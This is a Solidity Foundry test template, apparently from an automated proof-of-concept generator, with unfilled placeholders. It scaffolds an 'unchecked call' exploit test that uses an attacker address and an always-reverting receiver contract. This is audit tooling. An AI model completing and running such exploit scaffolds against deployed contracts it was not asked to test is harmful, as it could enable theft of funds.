// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

// {{CUSTOM_IMPORTS}}

/**
 * @title {{CONTRACT_NAME}} Unchecked Call Exploit PoC
 * @notice Proof of Concept for unchecked low-level call handling
 * @dev Generated by MIESC PoC Generator
 *
 * Vulnerability: {{DESCRIPTION}}
 * Severity: {{SEVERITY}}
 * Target Function: {{TARGET_FUNCTION}}
 * Generated: {{TIMESTAMP}}
 */
contract {{CONTRACT_NAME}}UncheckedCallTest is Test {
    address public target;
    address public attacker;
    RevertingReceiver public receiver;

    function setUp() public {
        attacker = makeAddr("attacker");
        vm.deal(attacker, {{ATTACKER_BALANCE}});
        receiver = new RevertingReceiver();

        // {{FORK_CONFIG}}
        // target = address(new {{CONTRACT_NAME}}());
        // {{CUSTOM_SETUP}}
    }

    function test_exploit_unchecked_call_result() public {
        console.log("=== Starting unchecked-call PoC ===");

        vm.prank(attacker);
        (bool success,) = target.call(
            abi.encodeWithSignature("{{TARGET_FUNCTION}}(address)", address(receiver))
        );

        console.log("Target call success:", success);
        // If the target ignores failed downstream calls, state may update despite receiver revert.
        // Add project-specific state assertions after binding the target.
    }
}

contract RevertingReceiver {
    receive() external payable {
        revert("reject ether");
    }
}
